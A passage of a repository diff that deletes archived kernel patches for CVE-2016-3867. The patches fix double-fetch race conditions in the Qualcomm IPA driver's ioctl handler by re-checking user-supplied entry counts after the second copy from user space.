-Date: Fri, 8 Jul 2016 16:20:33 -0700
-Subject: msm: ipa: fix potential race condition ioctls
-
-There are numerous potential race condition
-ioctls in the IPA driver. The fix is to add
-check wherever it copies arguments from
-user-space memory and process.
-
-Change-Id: I5a440f89153518507acdf5dad42625503732e59a
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa.c | 236 ++++++++++++++++++++++++++++++++++-------
- 1 file changed, 196 insertions(+), 40 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa.c b/drivers/platform/msm/ipa/ipa.c
-index adce191..5cfbbc9 100644
---- a/drivers/platform/msm/ipa/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa.c
-@@ -390,6 +390,7 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 	struct ipa_ioc_v4_nat_del nat_del;
- 	struct ipa_ioc_rm_dependency rm_depend;
- 	size_t sz;
-+	int pre_entry;
- 
- 	IPADBG("cmd=%x nr=%d\n", cmd, _IOC_NR(cmd));
- 
-@@ -438,11 +439,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
-+		pre_entry =
-+			((struct ipa_ioc_nat_dma_cmd *)header)->entries;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_nat_dma_cmd) +
--		   ((struct ipa_ioc_nat_dma_cmd *)header)->entries *
--		   sizeof(struct ipa_ioc_nat_dma_one);
-+		   pre_entry * sizeof(struct ipa_ioc_nat_dma_one);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -453,7 +454,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_nat_dma_cmd *)param)->entries
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_nat_dma_cmd *)param)->entries,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_nat_dma_cmd((struct ipa_ioc_nat_dma_cmd *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -478,10 +487,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_hdr *)header)->num_hdrs;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_hdr) +
--		   ((struct ipa_ioc_add_hdr *)header)->num_hdrs *
--		   sizeof(struct ipa_hdr_add);
-+		   pre_entry * sizeof(struct ipa_hdr_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -491,6 +501,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_hdr *)param)->num_hdrs
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_add_hdr *)param)->num_hdrs,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_add_hdr((struct ipa_ioc_add_hdr *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -507,10 +526,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_hdr *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_hdr) +
--		   ((struct ipa_ioc_del_hdr *)header)->num_hdls *
--		   sizeof(struct ipa_hdr_del);
-+		   pre_entry * sizeof(struct ipa_hdr_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -520,6 +540,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_hdr *)param)->num_hdls
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_del_hdr *)param)->num_hdls,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_del_hdr((struct ipa_ioc_del_hdr *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -536,10 +565,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_rt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_rt_rule) +
--		   ((struct ipa_ioc_add_rt_rule *)header)->num_rules *
--		   sizeof(struct ipa_rt_rule_add);
-+		   pre_entry * sizeof(struct ipa_rt_rule_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -549,6 +579,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_rt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_add_rt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_add_rt_rule((struct ipa_ioc_add_rt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -565,10 +605,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_mdfy_rt_rule) +
--		   ((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules *
--		   sizeof(struct ipa_rt_rule_mdfy);
-+		   pre_entry * sizeof(struct ipa_rt_rule_mdfy);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -578,6 +619,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_mdfy_rt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_mdfy_rt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_mdfy_rt_rule((struct ipa_ioc_mdfy_rt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -594,10 +645,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_rt_rule *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_rt_rule) +
--		   ((struct ipa_ioc_del_rt_rule *)header)->num_hdls *
--		   sizeof(struct ipa_rt_rule_del);
-+		   pre_entry * sizeof(struct ipa_rt_rule_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -607,6 +659,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_rt_rule *)param)->num_hdls
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_del_rt_rule *)param)->num_hdls,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_del_rt_rule((struct ipa_ioc_del_rt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -623,10 +684,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_flt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_flt_rule) +
--		   ((struct ipa_ioc_add_flt_rule *)header)->num_rules *
--		   sizeof(struct ipa_flt_rule_add);
-+		   pre_entry * sizeof(struct ipa_flt_rule_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -636,6 +698,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_flt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_add_flt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_add_flt_rule((struct ipa_ioc_add_flt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -652,10 +724,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_flt_rule *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_flt_rule) +
--		   ((struct ipa_ioc_del_flt_rule *)header)->num_hdls *
--		   sizeof(struct ipa_flt_rule_del);
-+		   pre_entry * sizeof(struct ipa_flt_rule_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -665,6 +738,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_flt_rule *)param)->num_hdls
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_del_flt_rule *)param)->
-+				num_hdls,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_del_flt_rule((struct ipa_ioc_del_flt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -681,10 +764,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_mdfy_flt_rule) +
--		   ((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules *
--		   sizeof(struct ipa_flt_rule_mdfy);
-+		   pre_entry * sizeof(struct ipa_flt_rule_mdfy);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -694,6 +778,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_mdfy_flt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_mdfy_flt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_mdfy_flt_rule((struct ipa_ioc_mdfy_flt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -801,15 +895,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		if (((struct ipa_ioc_query_intf_tx_props *)header)->num_tx_props
--				> IPA_NUM_PROPS_MAX) {
-+		if (((struct ipa_ioc_query_intf_tx_props *)
-+			header)->num_tx_props > IPA_NUM_PROPS_MAX) {
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		pyld_sz = sz + ((struct ipa_ioc_query_intf_tx_props *)
--				header)->num_tx_props *
-+		pre_entry =
-+			((struct ipa_ioc_query_intf_tx_props *)
-+			header)->num_tx_props;
-+		pyld_sz = sz + pre_entry *
- 			sizeof(struct ipa_ioc_tx_intf_prop);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
-@@ -820,6 +914,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_query_intf_tx_props *)
-+			param)->num_tx_props
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_query_intf_tx_props *)
-+				param)->num_tx_props, pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_query_intf_tx_props(
- 				(struct ipa_ioc_query_intf_tx_props *)param)) {
- 			retval = -1;
-@@ -836,15 +940,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		if (((struct ipa_ioc_query_intf_rx_props *)header)->num_rx_props
--				> IPA_NUM_PROPS_MAX) {
-+		if (((struct ipa_ioc_query_intf_rx_props *)
-+			header)->num_rx_props > IPA_NUM_PROPS_MAX) {
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		pyld_sz = sz + ((struct ipa_ioc_query_intf_rx_props *)
--				header)->num_rx_props *
-+		pre_entry =
-+			((struct ipa_ioc_query_intf_rx_props *)
-+			header)->num_rx_props;
-+		pyld_sz = sz + pre_entry *
- 			sizeof(struct ipa_ioc_rx_intf_prop);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
-@@ -855,6 +959,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_query_intf_rx_props *)
-+			param)->num_rx_props != pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_query_intf_rx_props *)
-+				param)->num_rx_props, pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_query_intf_rx_props(
- 				(struct ipa_ioc_query_intf_rx_props *)param)) {
- 			retval = -1;
-@@ -877,9 +990,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		pyld_sz = sz + ((struct ipa_ioc_query_intf_ext_props *)
--				header)->num_ext_props *
-+		pre_entry =
-+			((struct ipa_ioc_query_intf_ext_props *)
-+			header)->num_ext_props;
-+		pyld_sz = sz + pre_entry *
- 			sizeof(struct ipa_ioc_ext_intf_prop);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
-@@ -890,6 +1004,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_query_intf_ext_props *)
-+			param)->num_ext_props != pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_query_intf_ext_props *)
-+				param)->num_ext_props, pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_query_intf_ext_props(
- 				(struct ipa_ioc_query_intf_ext_props *)param)) {
- 			retval = -1;
-@@ -906,8 +1029,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_msg_meta *)header)->msg_len;
- 		pyld_sz = sizeof(struct ipa_msg_meta) +
--		   ((struct ipa_msg_meta *)header)->msg_len;
-+		   pre_entry;
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -917,6 +1042,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_msg_meta *)param)->msg_len
-+			!= pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_msg_meta *)param)->msg_len,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_pull_msg((struct ipa_msg_meta *)param,
- 				 (char *)param + sizeof(struct ipa_msg_meta),
- 				 ((struct ipa_msg_meta *)param)->msg_len) !=
-@@ -1032,10 +1166,12 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_hdr_proc_ctx *)
-+			header)->num_proc_ctxs;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_hdr_proc_ctx) +
--		   ((struct ipa_ioc_add_hdr_proc_ctx *)header)->num_proc_ctxs *
--		   sizeof(struct ipa_hdr_proc_ctx_add);
-+		   pre_entry * sizeof(struct ipa_hdr_proc_ctx_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -1045,6 +1181,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_hdr_proc_ctx *)
-+			param)->num_proc_ctxs != pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_add_hdr_proc_ctx *)
-+				param)->num_proc_ctxs, pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_add_hdr_proc_ctx(
- 			(struct ipa_ioc_add_hdr_proc_ctx *)param)) {
- 			retval = -EFAULT;
-@@ -1061,10 +1206,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_hdr_proc_ctx) +
--		   ((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls *
--		   sizeof(struct ipa_hdr_proc_ctx_del);
-+		   pre_entry * sizeof(struct ipa_hdr_proc_ctx_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -1074,6 +1220,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_hdr_proc_ctx *)
-+			param)->num_hdls != pre_entry)) {
-+			IPAERR("current %d pre %d\n",
-+				((struct ipa_ioc_del_hdr_proc_ctx *)param)->
-+				num_hdls,
-+				pre_entry);
-+			retval = -EFAULT;
-+			break;
-+		}
- 		if (ipa_del_hdr_proc_ctx(
- 			(struct ipa_ioc_del_hdr_proc_ctx *)param)) {
- 			retval = -EFAULT;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3867/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-3867/3.18/0002.patch
deleted file mode 100644
index 3d1fa1a4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3867/3.18/0002.patch
+++ /dev/null
@@ -1,1026 +0,0 @@
-From b518b33d4b7da7df5a0348a97ffb4f35be819937 Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Fri, 8 Jul 2016 16:20:33 -0700
-Subject: msm: ipa: fix potential race condition ioctls
-
-There are potential race condition ioctls in
-the IPA driver when it copies the actual
-arguments from the user-space memory to the
-IPA-driver. The fix is to add check on the 2nd
-copy to make sure the same payload size is copied
-to the pre-allocated kernel memory as in during
-the 1st copy.
-
-Change-Id: I5a440f89153518507acdf5dad42625503732e59a
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_v2/ipa.c | 226 +++++++++++++++++++++++++-----
- drivers/platform/msm/ipa/ipa_v3/ipa.c | 257 +++++++++++++++++++++++++++++-----
- 2 files changed, 411 insertions(+), 72 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa.c b/drivers/platform/msm/ipa/ipa_v2/ipa.c
-index 07b934f..72c9e8e 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa.c
-@@ -575,6 +575,7 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 	struct ipa_ioc_v4_nat_del nat_del;
- 	struct ipa_ioc_rm_dependency rm_depend;
- 	size_t sz;
-+	int pre_entry;
- 
- 	IPADBG("cmd=%x nr=%d\n", cmd, _IOC_NR(cmd));
- 
-@@ -623,11 +624,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
-+		pre_entry =
-+			((struct ipa_ioc_nat_dma_cmd *)header)->entries;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_nat_dma_cmd) +
--		   ((struct ipa_ioc_nat_dma_cmd *)header)->entries *
--		   sizeof(struct ipa_ioc_nat_dma_one);
-+		   pre_entry * sizeof(struct ipa_ioc_nat_dma_one);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -638,7 +639,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_nat_dma_cmd *)param)->entries
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_nat_dma_cmd *)param)->entries,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa2_nat_dma_cmd((struct ipa_ioc_nat_dma_cmd *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -663,10 +672,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_hdr *)header)->num_hdrs;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_hdr) +
--		   ((struct ipa_ioc_add_hdr *)header)->num_hdrs *
--		   sizeof(struct ipa_hdr_add);
-+		   pre_entry * sizeof(struct ipa_hdr_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -676,6 +686,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_hdr *)param)->num_hdrs
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_add_hdr *)param)->num_hdrs,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa2_add_hdr((struct ipa_ioc_add_hdr *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -692,10 +711,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_hdr *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_hdr) +
--		   ((struct ipa_ioc_del_hdr *)header)->num_hdls *
--		   sizeof(struct ipa_hdr_del);
-+		   pre_entry * sizeof(struct ipa_hdr_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -705,6 +725,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_hdr *)param)->num_hdls
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_del_hdr *)param)->num_hdls,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa2_del_hdr((struct ipa_ioc_del_hdr *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -721,10 +750,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_rt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_rt_rule) +
--		   ((struct ipa_ioc_add_rt_rule *)header)->num_rules *
--		   sizeof(struct ipa_rt_rule_add);
-+		   pre_entry * sizeof(struct ipa_rt_rule_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -734,6 +764,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_rt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_add_rt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa2_add_rt_rule((struct ipa_ioc_add_rt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -750,10 +790,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_mdfy_rt_rule) +
--		   ((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules *
--		   sizeof(struct ipa_rt_rule_mdfy);
-+		   pre_entry * sizeof(struct ipa_rt_rule_mdfy);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -763,6 +804,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_mdfy_rt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_mdfy_rt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa2_mdfy_rt_rule((struct ipa_ioc_mdfy_rt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -779,10 +830,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_rt_rule *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_rt_rule) +
--		   ((struct ipa_ioc_del_rt_rule *)header)->num_hdls *
--		   sizeof(struct ipa_rt_rule_del);
-+		   pre_entry * sizeof(struct ipa_rt_rule_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -792,6 +844,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_rt_rule *)param)->num_hdls
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_del_rt_rule *)param)->num_hdls,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa2_del_rt_rule((struct ipa_ioc_del_rt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -808,10 +869,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_flt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_flt_rule) +
--		   ((struct ipa_ioc_add_flt_rule *)header)->num_rules *
--		   sizeof(struct ipa_flt_rule_add);
-+		   pre_entry * sizeof(struct ipa_flt_rule_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -821,6 +883,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_flt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_add_flt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
